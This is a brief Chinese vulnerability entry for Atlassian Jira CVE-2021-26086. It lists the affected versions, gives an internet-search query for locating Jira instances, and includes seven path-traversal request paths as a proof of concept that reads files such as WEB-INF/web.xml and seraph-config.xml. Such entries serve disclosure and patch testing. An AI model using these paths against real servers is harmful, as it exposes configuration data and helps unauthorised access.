登录 白背景
源码

Atlassian Jira 敏感信息泄露 CVE-2021-26086

漏洞描述

JIRA是Atlassian公司出品的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。

参考链接:

漏洞影响

version < 8.5.14
8.6.0 ≤ version < 8.13.6
8.14.0 ≤ version < 8.16.1

网络测绘

app="ATLASSIAN-JIRA"

漏洞复现

poc:

/s/cfx/_/;/WEB-INF/web.xml
/s/cfx/_/;/WEB-INF/decorators.xml
/s/cfx/_/;/WEB-INF/classes/seraph-config.xml
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties